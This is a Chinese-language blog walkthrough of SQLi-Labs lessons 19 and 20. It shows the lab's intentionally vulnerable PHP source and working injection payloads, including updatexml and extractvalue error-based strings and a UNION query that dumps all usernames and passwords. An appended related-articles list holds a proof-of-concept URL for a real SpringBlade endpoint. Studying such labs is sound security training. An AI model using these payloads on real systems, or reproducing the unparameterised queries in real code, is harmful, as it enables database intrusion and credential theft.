  • include("../sql-connections/sql-connect.php");  
  • error_reporting(0);  
  •       
  • function check_input($value)  
  •     {  
  •     if(!empty($value))  
  •         {  
  •         // truncation (see comments)  
  •         $value = substr($value,0,20);  
  •         }  
  •   
  •         // Stripslashes if magic quotes enabled  
  •         if (get_magic_quotes_gpc())  
  •             {  
  •             $value = stripslashes($value);  
  •             }  
  •   
  •         // Quote if not a number  
  •         if (!ctype_digit($value))  
  •             {  
  •             $value = "'" . mysql_real_escape_string($value) . "'";  
  •             }  
  •           
  •     else  
  •         {  
  •         $value = intval($value);  
  •         }  
  •     return $value;  
  •     }  
  •   
  •   
  •   
  •     $uagent = $_SERVER['HTTP_REFERER'];  
  •     $IP = $_SERVER['REMOTE_ADDR'];  
  •     echo "
    ";  
  •     echo 'Your IP ADDRESS is: ' .$IP;  
  •     echo "
    ";  
  •     //echo 'Your User Agent is: ' .$uagent;  
  • // take the variables  
  • if(isset($_POST['uname']) && isset($_POST['passwd']))  
  •   
  •     {  
  •     $uname = check_input($_POST['uname']);  
  •     $passwd = check_input($_POST['passwd']);  
  •       
  •     /*  
  •     echo 'Your Your User name:'. $uname;  
  •     echo "
    ";  
  •     echo 'Your Password:'. $passwd;  
  •     echo "
    ";  
  •     echo 'Your User Agent String:'. $uagent;  
  •     echo "
    ";  
  •     echo 'Your User Agent String:'. $IP;  
  •     */  
  •   
  •     //logging the connection parameters to a file for analysis.   
  •     $fp=fopen('result.txt','a');  
  •     fwrite($fp,'Referer:'.$uname."\n");  
  •       
  •     fclose($fp);  
  •       
  •       
  •       
  •     $sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";  
  •     $result1 = mysql_query($sql);  
  •     $row1 = mysql_fetch_array($result1);  
  •         if($row1)  
  •             {  
  •             echo '';  
  •             $insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";  
  •             mysql_query($insert);  
  •             //echo 'Your IP ADDRESS is: ' .$IP;  
  •             echo "";  
  •             //echo "
    ";  
  •             echo '';              
  •             echo 'Your Referer is: ' .$uagent;  
  •             echo "";  
  •             echo "
    ";  
  •             print_r(mysql_error());           
  •             echo "

    ";  
  •             echo '';  
  •             echo "
    ";  
  •               
  •             }  
  •         else  
  •             {  
  •             echo '';  
  •             //echo "Try again looser";  
  •             print_r(mysql_error());  
  •             echo "
    ";           
  •             echo "
    ";  
  •             echo '';   
  •             echo "";    
  •             }  
  •   
  •     }  
  •   
  • ?>  
  •   
  •   
  •   
  •   
  •   
  •   

    • 从源代码中我们可以看到我们获取到的是HTTP_REFERER,那和less18是基本一致的,我们从referer进行修改
    SQLi-Labs 学习笔记(Less 11-20)_第33张图片

    要获取用户名和密码的话,和之前是一样的
    [plain]  view plain  copy
    1. ' or updatexml(1,concat(0x2b5e,(select concat_ws(char(32,44,32),id,username,password) from users limit 0,1)),1) or'  

    不过这次我们使用另一个函数,

    EXTRACTVALUE (XML_document, XPath_string); 
    第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 
    第二个参数:XPath_string (Xpath格式的字符串). 
    作用:从目标XML中返回包含所查询值的字符串

    [plain]  view plain  copy
    1. ' or extractvalue(1,concat(0x2b5e,(select concat_ws(char(32,44,32),id,username,password) from users limit 0,1))) or'  

    返回的结果是一样的,这里就不贴图了。


    Less-20基于错误的cookie头部POST注入

    先打开网页查看 Welcome Dhakkan
    SQLi-Labs 学习笔记(Less 11-20)_第34张图片


    ②查看源码:
    [plain]  view plain  copy
    1.   
    2.   
    3.   
    4.   
    5.   
    6. Less-20 Cookie Injection- Error Based- string  
    7.   
    8.   
    9.   
    11. //including the Mysql connect parameters.  
    12.     include("../sql-connections/sql-connect.php");  
    13.     error_reporting(0);  
    14. if(!isset($_COOKIE['uname']))  
    15.     {  
    16.     //including the Mysql connect parameters.  
    17.     include("../sql-connections/sql-connect.php");  
    18.   
    19.     echo " Welcome    Dhakkan 
    ";  
  •     echo "";  
  •     echo "";  
  •    
  •   
  •     echo "";  
  •     echo '';  
  •   
  •     echo ' Username :    ';  
  •     echo '     
    • ';  
  •     
  •     echo ' 
     Password :      ';  
  •     echo '   

    • ';   
  •     echo '   ';  
  •   
  •     echo '';  
  •     echo '';  
  •     echo '';  
  •     echo '';  
  •     echo '';  
  •     echo '



    ';  
  •     echo '';  
  •     echo '';  
  •   
  •   
  •   
  •   
  •       
  • function check_input($value)  
  •     {  
  •     if(!empty($value))  
  •         {  
  •         $value = substr($value,0,20); // truncation (see comments)  
  •         }  
  •         if (get_magic_quotes_gpc())  // Stripslashes if magic quotes enabled  
  •             {  
  •             $value = stripslashes($value);  
  •             }  
  •         if (!ctype_digit($value))       // Quote if not a number  
  •             {  
  •             $value = "'" . mysql_real_escape_string($value) . "'";  
  •             }  
  •     else  
  •         {  
  •         $value = intval($value);  
  •         }  
  •     return $value;  
  •     }  
  •   
  •   
  •       
  •     echo "
    ";  
  •     echo "
    ";  
  •       
  •     if(isset($_POST['uname']) && isset($_POST['passwd']))  
  •         {  
  •       
  •         $uname = check_input($_POST['uname']);  
  •         $passwd = check_input($_POST['passwd']);  
  •           
  •       
  •   
  •           
  •         $sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";  
  •         $result1 = mysql_query($sql);  
  •         $row1 = mysql_fetch_array($result1);  
  •         $cookee = $row1['username'];  
  •             if($row1)  
  •                 {  
  •                 echo '';  
  •                 setcookie('uname', $cookee, time()+3600);     
  •                 header ('Location: index.php');  
  •                 echo "I LOVE YOU COOKIES";  
  •                 echo "";  
  •                 echo '';              
  •                 //echo 'Your Cookie is: ' .$cookee;  
  •                 echo "";  
  •                 echo "
    ";  
  •                 print_r(mysql_error());           
  •                 echo "

    ";  
  •                 echo '';  
  •                 echo "
    ";  
  •                 }  
  •             else  
  •                 {  
  •                 echo '';  
  •                 //echo "Try again looser";  
  •                 print_r(mysql_error());  
  •                 echo "
    ";           
  •                 echo "
    ";  
  •                 echo '';    
  •                 echo "";    
  •                 }  
  •             }  
  •           
  •             echo "";    
  •     echo '';  
  •     echo '';  
  •   
  • }  
  • else  
  • {  
  •   
  •   
  •   
  •     if(!isset($_POST['submit']))  
  •         {  
  •               
  •             $cookee = $_COOKIE['uname'];  
  •             $format = 'D d M Y - H:i:s';  
  •             $timestamp = time() + 3600;  
  •             echo "
    ";  
  •             echo '


    ';  
  •             echo '';  
  •             echo "

    ";  
  •             echo '
    ';     
  •             echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];  
  •             echo "
    ";   
  •             echo '';      
  •             echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];             
  •             echo "
    ";           
  •             echo '';  
  •             echo "DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE 
    ";  
  •             echo '';           
  •             echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);  
  •               
  •               
  •             echo "
    ";  
  •             $sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";  
  •             $result=mysql_query($sql);  
  •             if (!$result)  
  •                 {  
  •                 die('Issue with your mysql: ' . mysql_error());  
  •                 }  
  •             $row = mysql_fetch_array($result);  
  •             if($row)  
  •                 {  
  •                 echo '';      
  •                 echo 'Your Login name:'. $row['username'];  
  •                 echo "
    ";  
  •                 echo '';      
  •                 echo 'Your Password:' .$row['password'];  
  •                 echo "";  
  •                 echo "
    ";  
  •                 echo 'Your ID:' .$row['id'];  
  •                 }  
  •             else      
  •                 {  
  •                 echo "
    ";  
  •                 echo '


    ';  
  •                 echo '';  
  •                 echo "

    ";  
  •                 //echo '';  
  •                 }  
  •             echo '
    ';  
  •             echo '';  
  •             echo '';  
  •             echo '';  
  •             echo '';  
  •         }     
  •     else  
  •         {  
  •         echo '
    ';  
  •         echo "
    ";  
  •         echo "
    ";  
  •         echo "
    ";  
  •         echo "
    ";  
  •         echo "
    ";  
  •         echo "
    ";  
  •         echo '';  
  •         echo " Your Cookie is deleted";  
  •                 setcookie('uname', $row1['username'], time()-3600);  
  •                 header ('Location: index.php');  
  •         echo '
    ';  
  •           
  •         }         
  •   
  •   
  •             echo "
    ";  
  •             echo "
    ";  
  •             //header ('Location: main.php');  
  •             echo "
    ";  
  •             echo "
    ";  
  •               
  •             //echo '';  
  •             //logging the connection parameters to a file for analysis.   
  •         $fp=fopen('result.txt','a');  
  •         fwrite($fp,'Cookie:'.$cookee."\n");  
  •       
  •         fclose($fp);  
  •       
  • }  
  • ?>  
  •   
  •   
  •   


    • 分析代码,首先判断有无cookie,没有的话,查询出来再设置cookie,若cookie存在,又分两种情况:

    第一种情况,你登陆过,cookie还有效,你没按删除cookie的按钮,那么他就输出各种信息,包括删除cookie的按钮
    SQLi-Labs 学习笔记(Less 11-20)_第35张图片

    第二种情况,你按了删除cookie的按钮,后台就把cookie的时间设置为过期的时间,那么cookie就被删除了

    关键代码:
    [plain]  view plain  copy
    1. $sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";  

    那么久不废话了,一次性搞定吧
    [plain]  view plain  copy
    1. -admin' union select 1,group_concat(char(32),username,char(32)),group_concat(char(32),password,char(32)) from users--+  
    SQLi-Labs 学习笔记(Less 11-20)_第36张图片

    你可能感兴趣的:(SQL注入)

    • SpringBlade dict-biz/list 接口 SQL 注入漏洞 文章永久免费只为良心 oracle数据库
      SpringBladedict-biz/list接口SQL注入漏洞POC:构造请求包查看返回包你的网址/api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,md5(1),0x7e),1)=1漏洞概述在SpringBlade框架中,如果dict-biz/list接口的后台处理逻辑没有正确地对用户输入进行过滤或参数化查询(PreparedSta
    • Web安全:Web体系架构存在的安全问题和解决方室 程序员-张师傅 前端安全web安全前端
      Web体系架构在提供丰富功能和高效服务的同时,也面临着诸多安全问题。这些问题可能涉及数据泄露、服务中断、系统被控制等多个方面,对企业和个人造成不可估量的损失。以下是对Web体系架构中存在的安全问题及解决方案的详细分析:Web体系架构存在的安全问题注入攻击SQL注入:攻击者通过在输入字段中插入恶意SQL代码,操控后台数据库,窃取、篡改或删除数据。OS命令注入:攻击者通过输入字段插入恶意代码,执行系统
    • 2021国家开放大学计算机网络安全技术形成性考核五 chaoliang.top 国开试题网络安全网络安全
      本人还会继续更新其他国家开放大学的试题,请大家多多关注,如果有什么建议,还希望大家提出来,本人也好完善本人在测试答案的时候发现,本章考试回顾结果中明明选对了答案,但是提示错误的情况,并且该题没有提示正确答案,这种情况应该是国开试题出现bug导致,请大家不要担心,如果有追求完美的同学,多答几次,可能就会避开这种题,因为出题是随机的。1.SQL注入一般可通过网页表单直接输入选择多项:对错正确答案:对2
    • 最新网络安全(黑客)——自学篇 黑客小雨 web安全安全
      *需要的小伙伴关注我第一阶段:基础操作入门,学习基础知识入门的第一步是学习一些当下主流的安全工具课程并配套基础原理的书籍,一般来说这个过程在1个月左右比较合适。在这个阶段,你已经对网络安全有了基本的了解。如果你学完了第一步,相信你已经在理论上明白了上面是sql注入,什么是xss攻击,对burp、msf、cs等安全工具也掌握了基础操作。这个时候最重要的就是开始打地基!所谓的“打地基”其实就是系统化的
    • Spring Interceptor Draper
      Spring中使用Interceptor拦截器与Servlet的listener比较相似,同样是监听请求,同样需要配置,一个是在web.xml中,Spring拦截器是在Spring配置文件中拦截未登录用户访问某些连接拦截日志信息拦截SQL注入执行顺序是preHandle->controller->postHandle->afterCompletionSpringInterceptor属于链式调用,
    • HP 应用程序如何防止 SQL 注入攻击提高程序安全稳定性? xiaohuojian1 android
      在PHP应用程序中,防止SQL注入攻击是确保程序安全和稳定的关键步骤。SQL注入攻击可以让恶意用户通过操控SQL查询来访问、修改或删除数据库中的数据,严重时甚至可能导致系统的完全控制。以下是防止SQL注入攻击的有效策略和最佳实践,以帮助提高PHP应用程序的安全性和稳定性。一、使用预处理语句和参数化查询1.预处理语句https://github.com/xhj2/p/issues/7预处理语句是防止
    • Web应用防火墙 Smile灬凉城666 网络安全WAF安全
      一、定义与目的WAF是一种特殊类型的防火墙,专门设计用于监视、过滤和阻挡进出Web应用的HTTP流量。其主要目的是保护Web应用免受如XSS(跨站脚本)、SQL注入、会话劫持等网络攻击。二、工作原理WAF工作在应用层,即OSI模型的第七层。它通过对HTTP/HTTPS请求进行解析、协议检测、攻击识别和恶意行为阻断等步骤来保护Web应用。具体来说,WAF会解析进入Web应用的HTTP/HTTPS请求
    • Web安全与网络安全:SQL漏洞注入 hong161688 web安全sqloracle
      Web安全与网络安全:SQL漏洞注入引言在Web安全领域,SQL注入漏洞(SQLInjectionVulnerability)是一种极具破坏性的安全威胁。它允许攻击者通过向Web应用程序的输入字段中插入或“注入”恶意的SQL代码片段,从而操纵后台数据库系统,执行未授权的数据库查询,甚至可能获取数据库管理权限,进而对整个系统造成严重的安全损害。本文将从SQL注入的原理、分类、危害及防御策略等方面进行
    • Web安全与网络安全:SQL漏洞注入 bigbig猩猩 typescriptvue.js前端
      Web安全与网络安全:SQL漏洞注入引言在Web安全领域,SQL注入漏洞(SQLInjectionVulnerability)是一种极具破坏性的安全威胁。它允许攻击者通过向Web应用程序的输入字段中插入或“注入”恶意的SQL代码片段,从而操纵后台数据库系统,执行未授权的数据库查询,甚至可能获取数据库管理权限,进而对整个系统造成严重的安全损害。本文将从SQL注入的原理、分类、危害及防御策略等方面进行
    • Web安全之SQL注入:如何预防及解决 J老熊 JavaWeb安全web安全sql数据库系统架构面试
      SQL注入(SQLInjection)是最常见的Web应用漏洞之一,它允许攻击者通过注入恶意SQL代码来操作数据库,获取、修改或删除数据。作为Java开发者,理解并防止SQL注入攻击是至关重要的。在本篇文章中,我们将详细介绍SQL注入的原理,演示如何在电商交易系统中出现SQL注入漏洞,并提供正确的防范措施和解决方案。1.什么是SQL注入?SQL注入是一种通过在用户输入中嵌入恶意SQL代码的攻击方式
    • Java Web安全与Spring Config对象实战 福建低调
      本文还有配套的精品资源,点击获取简介:本课程深入探讨JavaWeb开发中的安全实践,包括认证与授权、输入验证、CSRF和XSS防护以及SQL注入防御等关键安全措施。同时,介绍SpringSecurity框架的应用,以及Config对象在Spring配置管理中的作用,包括依赖注入和外部化配置。课程还包括实战演练,通过设置安全环境和安全漏洞模拟,帮助开发者提升应用的安全性和故障排查能力。1.Web安全
    • XSS和sql注入部分场景测试用例样例 谷隐凡二 测试xsssql测试用例
      目录1.SQL注入测试用例设计基本SQL注入复杂SQL注入盲注测试2.XSS攻击测试用例设计基本XSS攻击复杂XSS攻击DOM-basedXSS1.SQL注入测试用例设计SQL注入攻击通常通过在输入字段中插入恶意SQL代码,试图操纵数据库查询。设计这些测试用例时,需要涵盖各种常见的SQL注入技术。基本SQL注入用例1:使用单引号:输入:'OR'1'='1预期结果:应拒绝输入并返回错误消息,不应允许
    • Java代码审计篇:SQL注入 zkzq 数据库
      一、常见SQL注入1、sql语句动态拼接示例代码:Stringid=request.getParameter("id");res=st.executeQuery("SELECT*FROM\"IWEBSEC\".\"user\"WHERE\"id\"="+id);while(res.next()){intp=res.getInt("id");Stringn=res.getString("userna
    • Mybatis 防止sql注入 Ferrari1001
      SQL****注入是一种代码注入技术,用于攻击数据驱动的应用,恶意的****SQL****语句被插入到执行的实体字段中(例如,为了转储数据库内容给攻击者)。[摘自]SQLinjection-WikipediaSQL****注入,大家都不陌生,是一种常见的攻击方式。攻击者在界面的表单信息或URL上输入一些奇怪的SQL片段(例如“or‘1’=’1’”这样的语句),有可能入侵参数检验不足的应用程序。所以
    • sql注入常用函数 web安全工具库 小课堂sql注入常用函数
      当所有情绪都堆在一起的时候,才发现自己已经不是那个一块糖就能开心的小孩子了。。。----网易云热评一、MySql注入常用函数1、system_user()系统用户名2、user()用户名3、current_user()当前用户名4、session_user()链接数据库的用户名5、database()数据库名6、version()数据库版本7、@@datadir数据库路径8、@@basedir数据
    • python自动化笔记:操作mysql数据库 zhoukeguai python自动化笔记数据库python自动化
      操作mysql数据库常见方法1、第三方库:pymysql1.1、安装pymysql1.2、连接数据库1.3、连接指定数据库1.4创建数据库、创建表1.5、表中插入数据1.6、批量插入数据1.7、获取查询结果数据1.8、防sql注入,sql语句中一般用占位符传值2、标准库:mysql.connector2.1、安装mysql-connector2.2、操作方法1、第三方库:pymysql1.1、安装
    • Node.js 入门:中间件与安全性深度解析 Switch616 前端node.js中间件chrome服务器架构前端前端框架
      Node.js入门:中间件与安全性深度解析目录认证与授权使用jsonwebtoken实现JWT身份验证用户注册与登录:认证流程与实践️权限管理:安全访问控制详解️安全性防止SQL注入:参数化查询与ORM的最佳实践防止XSS攻击:用户输入处理与安全防护使用HTTPS和SSL/TLS:加密传输与数据安全⚠️错误处理️全局错误处理:确保应用稳定性的关键异常捕获与日志记录:有效排查问题的核心认证与授权使用
    • SQL注入漏洞检测 Kali与编程~ sql网络安全
      预计更新SQL注入概述1.1SQL注入攻击概述1.2SQL注入漏洞分类1.3SQL注入攻击的危害SQLMap介绍2.1SQLMap简介2.2SQLMap安装与配置2.3SQLMap基本用法SQLMap进阶使用3.1SQLMap高级用法3.2SQLMap配置文件详解3.3SQLMap插件的使用SQL注入漏洞检测4.1SQL注入漏洞检测基础4.2SQL注入漏洞检测工具4.3SQL注入漏洞检测实战SQL
    • sql注入漏洞 mineflame_ sql
      所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行指定的SQL语句。主要原因是程序员在开发用户和数据库交互的系统时没有对用户输入的字符串进行过滤,转义,限制或处理不严谨,导致用户可以通过输入精心构造的字符串去非法获取到数据库中的数据。具体来说,它是利用现有应用程序,将SQL语句注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入
    • Oracle(107)什么是数据库防火墙(Database Firewall)? 辞暮尔尔-烟火年年 Oracle数据库oracle
      数据库防火墙(DatabaseFirewall)是一种安全技术,用于监控和控制对数据库的访问,以防止未经授权的访问、SQL注入攻击和其他恶意活动。数据库防火墙可以实时分析和过滤SQL查询,确保只有合法的、预期的查询能够到达数据库,从而保护数据库的完整性和安全性。数据库防火墙的主要功能SQL语句分析和过滤:实时分析传入的SQL语句,阻止恶意或未经授权的SQL语句。行为基准:建立正常SQL语句的基准,
    • java sql注入正则表达式_Java程序员从笨鸟到菜鸟之(一百零二)sql注入攻击详解(三)sql注入解决办法... 用看智障的眼神看 javasql注入正则表达式
      我们了解了sql注入原理和sql注入过程,今天我们就来了解一下sql注入的解决办法。怎么来解决和防范sql注入,由于本人主要是搞javaweb开发的小程序员,所以这里我只讲一下有关于javaweb的防止办法。其实对于其他的,思路基本相似。下面我们先从web应用程序的角度来看一下如何避免sql注入:1、普通用户与系统管理员用户的权限要有严格的区分。如果一个普通用户在使用查询语句中嵌入另一个DropT
    • php操作mysql防止sql注入(合集) get200 mysqlmysql注入
      本文将从sql注入风险说起,并且比较addslashes、mysql_escape_string、mysql_real_escape_string、mysqli和pdo的预处理的区别。当一个变量从表单传入到php,需要查询mysql的话,需要进行处理。举例:$unsafe_variable=$_POST[‘user_input’];mysqli_query(“INSERTINTOtable(col
    • 基于流谱理论的SSL/TLS协议攻击检测方法 米朵儿技术屋 大数据与数字化的设计应用专栏ssl网络协议网络
      摘要网络攻击检测在网络安全中扮演着重要角色。网络攻击检测的对象主要为僵尸网络、SQL注入等攻击行为。随着安全套接层/安全传输层(SSL/TLS)加密协议的广泛使用,针对SSL/TLS协议本身发起的SSL/TLS攻击日益增多,因此通过搭建网络流采集环境,构建了包含4种SSL/TLS攻击网络流与正常网络流的网络流数据集。针对当前网络攻击流检测的可观测性有限、网络流原始时空域分离性有限等问题,提出流谱理
    • 【网络安全面经】渗透面经、安服面经、红队面经、hw面经应有尽有 这一篇真的够了 webfker from 0 to 1 githubgitjava
      目录面经牛客奇安信面经(五星推荐)牛客面经(推荐)渗透测试面经(推荐)渗透测试技巧计网面经SQL注入漏洞注入绕过XXE漏洞最强面经Github面经模拟面WEB安全PHP安全网络安全密码学一、青藤二、360三、漏洞盒子四、未知厂商五、长亭-红队六、qax七、天融信八、安恒九、长亭十、国誉网安十一、360-红队十二、天融信十三、长亭-2十四、360-2十五、极盾科技十六、阿里十七、长亭3十八、qax-
    • javaWeb安全漏洞修复总结 dechen6073 java数据库web安全
      1Web安全介绍12SQL注入、盲注12.1SQL注入、盲注概述12.2安全风险及原因22.3AppScan扫描建议22.4应用程序解决方案43会话标识未更新73.1会话标识未更新概述73.2安全风险及原因分析73.3AppScan扫描建议83.4应用程序解决方案84已解密登录请求84.1已解密登录请求概述84.2安全风险及原因分析84.3AppScan扫描建议94.4应用程序解决方案95跨站点请
    • Web攻击-XSS、CSRF、SQL注入 rrrobber 前端xsscsrf
      1.XSS攻击:跨站脚本攻击XSS(CrossSiteScripting),跨站脚本攻击,允许攻击者将恶意代码植入到提供给其它用户使用的页面中。XSS的攻击目标是为了盗取存储在客户端的cookie或者其他网站用于识别客户端身份的敏感信息。一旦获取到合法用户的信息后,攻击者甚至可以假冒合法用户与网站进行交互。根据攻击来源被分为存储型、反射型、DOM型1.1.存储型存储型XSS的攻击步骤:攻击者将恶意
    • 【网络安全】SQL注入详解 白袍无涯 sqlweb安全数据库网络安全系统安全
      一、什么是sql注入SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登录,甚至篡改数据库。二、SQL注入攻击的总体思路1:寻找到SQL注入的位置2:判断服务器类型和后台数据库类型3:针对不同的服务器和数据库特点进行SQL注入攻击三、SQL注入攻击实例Stringsql="select*fromuser_tablew
    • ctfshow-web入门-sql注入-web172 HkD01L ctfshowSQL注入sql数据库
      题目描述查询语句//拼接sql语句查找指定ID用户$sql="selectusername,passwordfromctfshow_user2whereusername!='flag'andid='".$_GET['id']."'limit1;";返回逻辑//检查结果是否有flagif($row->
    • 用友U8 Cloud RepAddToTaskAction SQL注入漏洞复现 天官赐福万无禁忌 漏洞复现安全web安全
      1产品简介用友U8Cloud是用友推出的新一代云ERP,主要聚焦成长型、创新型企业,提供企业级云ERP整体解决方案。2漏洞概述用友U8CloudRepAddToTaskAction接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。3影响范围
    • SQL 注入新视角:堆查询、JSON 与头部 XFF 注入剖析及防范 白袍无涯 sql安全web安全网络安全计算机网络安全架构系统安全
      在SQL注入攻击的世界中,除了一些常见的注入方式外,还有堆查询注入、JSON注入以及头部XFF注入等较为特殊的攻击手段。这些攻击方式利用不同的场景和漏洞,对数据库安全构成严重威胁。本文将详细介绍这三种SQL注入攻击方式的原理和特点。一、堆查询注入1.原理堆查询注入是一种利用数据库中可以同时执行多个查询的特性进行攻击的方法。在某些数据库系统中,可以通过分号将多个查询语句连接起来执行。攻击者利用这个特
    • 关于旗正规则引擎规则中的上传和下载问题 何必如此 文件下载压缩jsp文件上传
      文件的上传下载都是数据流的输入输出,大致流程都是一样的。 一、文件打包下载 1.文件写入压缩包 string mainPath="D:\upload\";     下载路径 string tmpfileName=jar.zip;        &n
    • 【Spark九十九】Spark Streaming的batch interval时间内的数据流转源码分析 bit1129 Stream
        以如下代码为例(SocketInputDStream): Spark Streaming从Socket读取数据的代码是在SocketReceiver的receive方法中,撇开异常情况不谈(Receiver有重连机制,restart方法,默认情况下在Receiver挂了之后,间隔两秒钟重新建立Socket连接),读取到的数据通过调用store(textRead)方法进行存储。数据
    • spark master web ui 端口8080被占用解决方法 daizj 8080端口占用sparkmaster web ui
      spark master web ui 默认端口为8080,当系统有其它程序也在使用该接口时,启动master时也不会报错,spark自己会改用其它端口,自动端口号加1,但为了可以控制到指定的端口,我们可以自行设置,修改方法:   1、cd SPARK_HOME/sbin   2、vi start-master.sh     3、定位到下面部分
    • oracle_执行计划_谓词信息和数据获取 周凡杨 oracle执行计划
        oracle_执行计划_谓词信息和数据获取(上) 一:简要说明 在查看执行计划的信息中,经常会看到两个谓词filter和access,它们的区别是什么,理解了这两个词对我们解读Oracle的执行计划信息会有所帮助。 简单说,执行计划如果显示是access,就表示这个谓词条件的值将会影响数据的访问路径(表还是索引),而filter表示谓词条件的值并不会影响数据访问路径,只起到
    • spring中datasource配置 g21121 dataSource
      datasource配置有很多种,我介绍的一种是采用c3p0的,它的百科地址是: http://baike.baidu.com/view/920062.htm   <!-- spring加载资源文件 --> <bean name="propertiesConfig" class="org.springframework.b
    • web报表工具FineReport使用中遇到的常见报错及解决办法(三) 老A不折腾 finereportFAQ报表软件
      这里写点抛砖引玉,希望大家能把自己整理的问题及解决方法晾出来,Mark一下,利人利己。   出现问题先搜一下文档上有没有,再看看度娘有没有,再看看论坛有没有。有报错要看日志。下面简单罗列下常见的问题,大多文档上都有提到的。 1、repeated column width is largerthan paper width: 这个看这段话应该是很好理解的。比如做的模板页面宽度只能放
    • mysql 用户管理 墙头上一根草 linuxmysqluser
      1.新建用户 //登录MYSQL@>mysql -u root -p@>密码//创建用户mysql> insert into mysql.user(Host,User,Password) values(‘localhost’,'jeecn’,password(‘jeecn’));//刷新系统权限表mysql>flush privileges;这样就创建了一个名为:
    • 关于使用Spring导致c3p0数据库死锁问题 aijuans springSpring 入门Spring 实例Spring3Spring 教程
      这个问题我实在是为整个 springsource 的员工蒙羞 如果大家使用 spring 控制事务,使用 Open Session In View 模式, com.mchange.v2.resourcepool.TimeoutException: A client timed out while waiting to acquire a resource from com.mchange.
    • 百度词库联想 annan211 百度
      <!DOCTYPE html> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>RunJS</title&g
    • int数据与byte之间的相互转换实现代码 百合不是茶 位移int转bytebyte转int基本数据类型的实现
      在BMP文件和文件压缩时需要用到的int与byte转换,现将理解的贴出来;   主要是要理解;位移等概念 http://baihe747.iteye.com/blog/2078029   int转byte;   byte转int;   /** * 字节转成int,int转成字节 * @author Administrator *
    • 简单模拟实现数据库连接池 bijian1013 javathreadjava多线程简单模拟实现数据库连接池
      简单模拟实现数据库连接池 实例1: package com.bijian.thread; public class DB { //private static final int MAX_COUNT = 10; private static final DB instance = new DB(); private int count = 0; private i
    • 一种基于Weblogic容器的鉴权设计 bijian1013 javaweblogic
              服务器对请求的鉴权可以在请求头中加Authorization之类的key,将用户名、密码保存到此key对应的value中,当然对于用户名、密码这种高机密的信息,应该对其进行加砂加密等,最简单的方法如下: String vuser_id = "weblogic"; String vuse
    • 【RPC框架Hessian二】Hessian 对象序列化和反序列化 bit1129 hessian
       任何一个对象从一个JVM传输到另一个JVM,都要经过序列化为二进制数据(或者字符串等其他格式,比如JSON),然后在反序列化为Java对象,这最后都是通过二进制的数据在不同的JVM之间传输(一般是通过Socket和二进制的数据传输),本文定义一个比较符合工作中。   1. 定义三个POJO    Person类 package com.tom.hes
    • 【Hadoop十四】Hadoop提供的脚本的功能 bit1129 hadoop
      1. hadoop-daemon.sh 1.1 启动HDFS ./hadoop-daemon.sh start namenode ./hadoop-daemon.sh start datanode  通过这种逐步启动的方式,比start-all.sh方式少了一个SecondaryNameNode进程,这不影响Hadoop的使用,其实在 Hadoop2.0中,SecondaryNa
    • 中国互联网走在“灰度”上 ronin47 管理 灰度
      中国互联网走在“灰度”上(转) 文/孕峰   第一次听说灰度这个词,是任正非说新型管理者所需要的素质。第二次听说是来自马化腾。似乎其他人包括马云也用不同的语言说过类似的意思。   灰度这个词所包含的意义和视野是广远的。要理解这个词,可能同样要用“灰度”的心态。灰度的反面,是规规矩矩,清清楚楚,泾渭分明,严谨条理,是决不妥协,不转弯,认死理。黑白分明不是灰度,像彩虹那样
    • java-51-输入一个矩阵,按照从外向里以顺时针的顺序依次打印出每一个数字。 bylijinnan java
      public class PrintMatrixClockwisely { /** * Q51.输入一个矩阵,按照从外向里以顺时针的顺序依次打印出每一个数字。 例如:如果输入如下矩阵: 1 2 3 4 5 6 7 8 9
    • mongoDB 用户管理 开窍的石头 mongoDB用户管理
        1:添加用户    第一次设置用户需要进入admin数据库下设置超级用户(use admin)      db.addUsr({user:'useName',pwd:'111111',roles:[readWrite,dbAdmin]});    第一个参数用户的名字    第二个参数
    • [游戏与生活]玩暗黑破坏神3的一些问题 comsci 生活
          暗黑破坏神3是有史以来最让人激动的游戏。。。。但是有几个问题需要我们注意      玩这个游戏的时间,每天不要超过一个小时,且每次玩游戏最好在白天      结束游戏之后,最好在太阳下面来晒一下身上的暗黑气息,让自己恢复人的生气   &nb
    • java 二维数组如何存入数据库 cuiyadll java
      using System; using System.Linq; using System.Text; using System.Windows.Forms; using System.Xml; using System.Xml.Serialization; using System.IO; namespace WindowsFormsApplication1 {
    • 本地事务和全局事务Local Transaction and Global Transaction(JTA) darrenzhu javaspringlocalglobaltransaction
      Configuring Spring and JTA without full Java EE http://spring.io/blog/2011/08/15/configuring-spring-and-jta-without-full-java-ee/ Spring doc -Transaction Management http://docs.spring.io/spri
    • Linux命令之alias - 设置命令的别名,让 Linux 命令更简练 dcj3sjt126com linuxalias
      用途说明 设置命令的别名。在linux系统中如果命令太长又不符合用户的习惯,那么我们可以为它指定一个别名。虽然可以为命令建立“链接”解决长文件名的问 题,但对于带命令行参数的命令,链接就无能为力了。而指定别名则可以解决此类所有问题【1】。常用别名来简化ssh登录【见示例三】,使长命令变短,使常 用的长命令行变短,强制执行命令时询问等。   常用参数 格式:alias 格式:ali
    • yii2 restful web服务[格式响应] dcj3sjt126com PHPyii2
